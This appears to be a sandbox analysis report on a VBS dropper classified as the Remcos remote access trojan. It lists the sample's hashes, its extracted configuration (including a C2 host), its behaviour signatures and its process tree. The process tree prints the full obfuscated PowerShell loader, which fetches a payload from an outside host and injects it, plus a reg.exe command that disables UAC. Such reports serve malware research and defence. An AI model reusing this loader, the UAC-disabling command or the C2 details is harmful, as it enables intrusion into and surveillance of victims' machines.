Overview

overview

10

Static

static

1

a9b35270a1...12.vbs

windows7-x64

10

a9b35270a1...12.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 03:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12.vbs

  • Size

    16KB

  • MD5

    7629b8a9f44c0d82a77edd71ff758028

  • SHA1

    c7e7708565e250860139338d8a0dd79ba05a0b54

  • SHA256

    a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12

  • SHA512

    2ede58762d50013647f32a1b55c9979f0f99820c5e0fc2dbc94403d80f9a222fb07f319857e4fc2a25407b4c33d118250e4ff48475d83c49333c9c23a591d15c

  • SSDEEP

    384:9Wl6/kDhGteC20UFY0Z0o6m1PdFu+mTD5Za:3/kMteC2VFeo64PruJK

Score
10/10
remcosremotehostdiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

hg575438h-0.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WNVZ5S

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe MortSTestyOffesforeT Di eReknM Syl.Mis $Knips ajePStamlRekoeSeceESub NTerreRy kNAdkvS');dalmatiners ($billetsalg);dalmatiners (Preenforcing 'Rntg$ElekARecorP rcbLydtiPenstSerarBarba Tykg dbeAnteaMidtfRemedLinoeTegnlHalui ubn IndgCollere,an D.v.bemeHAflyeHai aMisudStjmeEnrorpen sBrun[ T p$AlcyDUmaau JetnDagigValshR,byiCicelAd llNank]Rect=S.ar$ alvNDuloo Vo.nCynouBra t SveiSen lSno iOmfatAgteiAtike atis');$Lastvrk=Preenforcing ' U.s$ FriAVe,trCircbOctaiMor,t ntrUnmoaSporgSubde ngaaDislf La dSfyreWatclNonti,estnVe eg ForeMontn Reg.FighD BlaoFentwS,aanRuc lRe ooS joaStoldtrd FR naiEsmelWoefe Dah(Post$Gen SSammlM nsuRadikspilkFje,eFlertMont,Hypn$PostONonevSeaseGaa reftesTegnkS rguHomodR.cisTracp C.frM dtoPro dE,eruPr,tkEvertBoroi BrnoEscanlowle farr icenLigeeSpils,ord)';$Overskudsproduktionernes=$Ledelinie250;dalmatiners (Preenforcing ',ndd$ Hemg Or.L armOBortBSonja DisLGern: BriHkrukymuckdA,hmr IleUPaafr Attu ors ,or=Se.e(,tiktFiliekrlissol,TLege-AnidpDepaAKernTPreshAlde Nonc$FormOGardv f jE T nrConvSQuadkPh.luskeeDSkinsIntepBobbr akOPoseDS raU.etoKSymmtAn iIAft O Slun agdeMotorPolyNRenheT.rpS g i)');while (!$Hydrurus) {dalmatiners (Preenforcing ' Spi$ChaigChimlSdsuoSma.bB,eaaHa mlNonr:afveC ,rshZardaAvigrParattilgrHulki Bo ngradgOye,e Refnbed.= Pap$Ch ePDroso BartDrttiRecacOverhCyclo mimmFootaAabnnArboiAfgaa') ;dalmatiners $Lastvrk;dalmatiners (Preenforcing 'R crSTusit Un a ResRB ldTSepo-JydsSVan.L MeaeOndaEDiespDeic Sp n4');dalmatiners (Preenforcing ' Nyt$BioggDespl S eO GarbSigta rtilPali:Ven hKonfyR gndIna,rBeriU la.r Lu UVagaSAlfa=.uto(TunftRespeEthosUkloTAlgi-HimmPFejlABeauTRefehOut. Chik$Ukldo HvlvJor E S bRSubesPoolkUnd.u ,ledAll s UnspLapiR isdODundDNegeUK,rkK MartFrasI H cOinteNGh seKaraR IniNJernEDextsInge)') ;dalmatiners (Preenforcing ' Inf$Fo,sGPedilLejeoLaboB jenaNysgL Lan:IncuTS bfrL.ndEMyndEO erII.dhNg ndG oad=dors$J veg aadlAthrOLieuBAag aCalllmiss:Bardy esknBiflGRepeLUnp.ESpleDY tpyBespg CalT dueiRiemgDds eHjkiSDrab+Bl k+Si.e% Sol$Unsuc O,tOBllen E cSUngkt SteRRubbu CamcEremTSko.iLovfoLselnSedaA Scol A blTi,ey rov.Exarce,feoFrinu SkonGarrT') ;$Slukket=$Constructionally[$Treeing]}$Polaristrobometer=307322;$databgernterpretative=30954;dalmatiners (Preenforcing ' ele$Evi,GA,icL TomoTr mbPoleADrhalGire:Flagd edeRStraAD.gaGHoveePreueulovrBygnn auE run V l=Ubet AlkoGDallEBru tSt d-OutrC nseo H,nNN,nrTOmseECrofnShelT M.d St e$Predooph,VAs iENon RSkilSTovekIatrU A eDCiriS Al.p I oRSilvodegaDDemouautokDybsTImmuI LacO.igan LonEUdf.rBas.n TenetrniS');dalmatiners (Preenforcing 'pols$ExtegrecolAd loYde.b.steaBai,lPins: AmoE Gral Fl a Sorb Dego E erMi,naHumbtBicieSupesSyge S,e=Udb. Kali[BestSoneryPressFremtLar.eEgetmEmba.A,dwCRehaoMo rnAffav KleeT llrKrfttGr m]Stot: ,is:BlafFCla rR.daoTaksmTatoBT pka oofsfld eEarn6 .ud4Mis,S lytB,rtr ElriReapnUnstg.ngv(Orga$ T.dD Zy rPostasab.gTalleArche lygrW,ennwo,geNatb)');dalmatiners (Preenforcing ' Gra$Pa tGChadLUdenOPlumbBenaa Vi.l Pra: RepJSkanIBebum A tjBalaASupeMN tusLedn Kaff=Natt In r[ arrssqueYmid s FagTbl kEForlmAcre.S,amTBri eRachxcic TCal . S,mESpidNNonfCWan Or gnDSvmmiBrann St g.ors]Typo:Cali: s iaFjersTr ic,jleISub,ICons.NetsGLageeMa cT Tr SFilmTMichrBopyIBo unFri.gAuto(Hj,m$InvoEEn.elBu taIoniBDveloPantrCoota PretAflaeTodksHist)');dalmatiners (Preenforcing '.tal$B ocGRimsLInfaORealBDainAUdstlgamm:SpinpBidseThorlPanmeLugtc EenASpydnUnfaUL ndSResn= .re$PrerjGib i FejmUltijEpima sadMOverSLanc.CavasSu fuSillbbardsOleaT orsROpb iD asnA.begA om(Sejs$ Ep,PHoveO raglRib ADdker,ednI Pl.SDoodTNonbrPuseOCatcbspe OUnc MDisse.olstOutqE jerR alg,Kont$ ,usDP,tta G eTUndeaElg BetvrgInduERediR miln UndtSa sE orkROph P unkRRevieP.ssTPr mABri.TViroiM llVDagse ut)');dalmatiners $Pelecanus;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3208
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe MortSTestyOffesforeT Di eReknM Syl.Mis $Knips ajePStamlRekoeSeceESub NTerreRy kNAdkvS');dalmatiners ($billetsalg);dalmatiners (Preenforcing 'Rntg$ElekARecorP rcbLydtiPenstSerarBarba Tykg dbeAnteaMidtfRemedLinoeTegnlHalui ubn IndgCollere,an D.v.bemeHAflyeHai aMisudStjmeEnrorpen sBrun[ T p$AlcyDUmaau JetnDagigValshR,byiCicelAd llNank]Rect=S.ar$ alvNDuloo Vo.nCynouBra t SveiSen lSno iOmfatAgteiAtike atis');$Lastvrk=Preenforcing ' U.s$ FriAVe,trCircbOctaiMor,t ntrUnmoaSporgSubde ngaaDislf La dSfyreWatclNonti,estnVe eg ForeMontn Reg.FighD BlaoFentwS,aanRuc lRe ooS joaStoldtrd FR naiEsmelWoefe Dah(Post$Gen SSammlM nsuRadikspilkFje,eFlertMont,Hypn$PostONonevSeaseGaa reftesTegnkS rguHomodR.cisTracp C.frM dtoPro dE,eruPr,tkEvertBoroi BrnoEscanlowle farr icenLigeeSpils,ord)';$Overskudsproduktionernes=$Ledelinie250;dalmatiners (Preenforcing ',ndd$ Hemg Or.L armOBortBSonja DisLGern: BriHkrukymuckdA,hmr IleUPaafr Attu ors ,or=Se.e(,tiktFiliekrlissol,TLege-AnidpDepaAKernTPreshAlde Nonc$FormOGardv f jE T nrConvSQuadkPh.luskeeDSkinsIntepBobbr akOPoseDS raU.etoKSymmtAn iIAft O Slun agdeMotorPolyNRenheT.rpS g i)');while (!$Hydrurus) {dalmatiners (Preenforcing ' Spi$ChaigChimlSdsuoSma.bB,eaaHa mlNonr:afveC ,rshZardaAvigrParattilgrHulki Bo ngradgOye,e Refnbed.= Pap$Ch ePDroso BartDrttiRecacOverhCyclo mimmFootaAabnnArboiAfgaa') ;dalmatiners $Lastvrk;dalmatiners (Preenforcing 'R crSTusit Un a ResRB ldTSepo-JydsSVan.L MeaeOndaEDiespDeic Sp n4');dalmatiners (Preenforcing ' Nyt$BioggDespl S eO GarbSigta rtilPali:Ven hKonfyR gndIna,rBeriU la.r Lu UVagaSAlfa=.uto(TunftRespeEthosUkloTAlgi-HimmPFejlABeauTRefehOut. Chik$Ukldo HvlvJor E S bRSubesPoolkUnd.u ,ledAll s UnspLapiR isdODundDNegeUK,rkK MartFrasI H cOinteNGh seKaraR IniNJernEDextsInge)') ;dalmatiners (Preenforcing ' Inf$Fo,sGPedilLejeoLaboB jenaNysgL Lan:IncuTS bfrL.ndEMyndEO erII.dhNg ndG oad=dors$J veg aadlAthrOLieuBAag aCalllmiss:Bardy esknBiflGRepeLUnp.ESpleDY tpyBespg CalT dueiRiemgDds eHjkiSDrab+Bl k+Si.e% Sol$Unsuc O,tOBllen E cSUngkt SteRRubbu CamcEremTSko.iLovfoLselnSedaA Scol A blTi,ey rov.Exarce,feoFrinu SkonGarrT') ;$Slukket=$Constructionally[$Treeing]}$Polaristrobometer=307322;$databgernterpretative=30954;dalmatiners (Preenforcing ' ele$Evi,GA,icL TomoTr mbPoleADrhalGire:Flagd edeRStraAD.gaGHoveePreueulovrBygnn auE run V l=Ubet AlkoGDallEBru tSt d-OutrC nseo H,nNN,nrTOmseECrofnShelT M.d St e$Predooph,VAs iENon RSkilSTovekIatrU A eDCiriS Al.p I oRSilvodegaDDemouautokDybsTImmuI LacO.igan LonEUdf.rBas.n TenetrniS');dalmatiners (Preenforcing 'pols$ExtegrecolAd loYde.b.steaBai,lPins: AmoE Gral Fl a Sorb Dego E erMi,naHumbtBicieSupesSyge S,e=Udb. Kali[BestSoneryPressFremtLar.eEgetmEmba.A,dwCRehaoMo rnAffav KleeT llrKrfttGr m]Stot: ,is:BlafFCla rR.daoTaksmTatoBT pka oofsfld eEarn6 .ud4Mis,S lytB,rtr ElriReapnUnstg.ngv(Orga$ T.dD Zy rPostasab.gTalleArche lygrW,ennwo,geNatb)');dalmatiners (Preenforcing ' Gra$Pa tGChadLUdenOPlumbBenaa Vi.l Pra: RepJSkanIBebum A tjBalaASupeMN tusLedn Kaff=Natt In r[ arrssqueYmid s FagTbl kEForlmAcre.S,amTBri eRachxcic TCal . S,mESpidNNonfCWan Or gnDSvmmiBrann St g.ors]Typo:Cali: s iaFjersTr ic,jleISub,ICons.NetsGLageeMa cT Tr SFilmTMichrBopyIBo unFri.gAuto(Hj,m$InvoEEn.elBu taIoniBDveloPantrCoota PretAflaeTodksHist)');dalmatiners (Preenforcing '.tal$B ocGRimsLInfaORealBDainAUdstlgamm:SpinpBidseThorlPanmeLugtc EenASpydnUnfaUL ndSResn= .re$PrerjGib i FejmUltijEpima sadMOverSLanc.CavasSu fuSillbbardsOleaT orsROpb iD asnA.begA om(Sejs$ Ep,PHoveO raglRib ADdker,ednI Pl.SDoodTNonbrPuseOCatcbspe OUnc MDisse.olstOutqE jerR alg,Kont$ ,usDP,tta G eTUndeaElg BetvrgInduERediR miln UndtSa sE orkROph P unkRRevieP.ssTPr mABri.TViroiM llVDagse ut)');dalmatiners $Pelecanus;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3520

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    a6b2921f7a5f7efbeba42f0ec9015165

    SHA1

    e2d57d9f7ccf095e9726f60b2b9bfa58ea79f0ab

    SHA256

    1bf7e363cf667c867fb577b72dd86d7126d9a93f664ba035e74cb4c0eaea4ba5

    SHA512

    2fc45245506d8a1801033a0cc06ec52332f37391c61f33ecf5fc432baa54b3df15f580fea9b0dce656d791db6858f6b644bc7f30b84cbaf5c16093162f152bbe

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qxqhnjx1.15g.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\mandolin.Udr
    Filesize

    440KB

    MD5

    cc70b6c33ca1916df2146cd72741752a

    SHA1

    05bbef8b94d2318f8632552fb91d808b24a0b538

    SHA256

    d25c576fee8fb82fee627af91c3c80c1360b22f87de1ef3d3efd4be314d109e0

    SHA512

    eed050f07a8fd96a271288447a0c1d5564caa1815a55bcb2b1c0a0db8605b55300a9a8c55fd6bc1d787736ec1b1bd72ef96e9baf73185f22ed2716404e4fa80a

    Download Submit

  • memory/1816-64-0x0000000001200000-0x0000000002454000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1816-63-0x0000000001200000-0x0000000002454000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1924-46-0x00000000079F0000-0x0000000007A12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1924-42-0x0000000006950000-0x000000000699C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1924-49-0x0000000009230000-0x000000000EA39000-memory.dmp

    Filesize

    88.0MB

    Download

  • memory/1924-25-0x0000000005210000-0x0000000005246000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1924-26-0x00000000059E0000-0x0000000006008000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1924-27-0x0000000005920000-0x0000000005942000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1924-28-0x0000000006010000-0x0000000006076000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1924-29-0x00000000060F0000-0x0000000006156000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1924-39-0x00000000061E0000-0x0000000006534000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1924-47-0x0000000008C80000-0x0000000009224000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1924-41-0x00000000067E0000-0x00000000067FE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1924-45-0x0000000007A90000-0x0000000007B26000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1924-44-0x0000000006D90000-0x0000000006DAA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1924-43-0x0000000008050000-0x00000000086CA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3208-21-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3208-4-0x00007FFE58A43000-0x00007FFE58A45000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3208-20-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3208-19-0x00007FFE58A43000-0x00007FFE58A45000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3208-24-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3208-16-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3208-15-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3208-5-0x00000258F6310000-0x00000258F6332000-memory.dmp

    Filesize

    136KB

    Download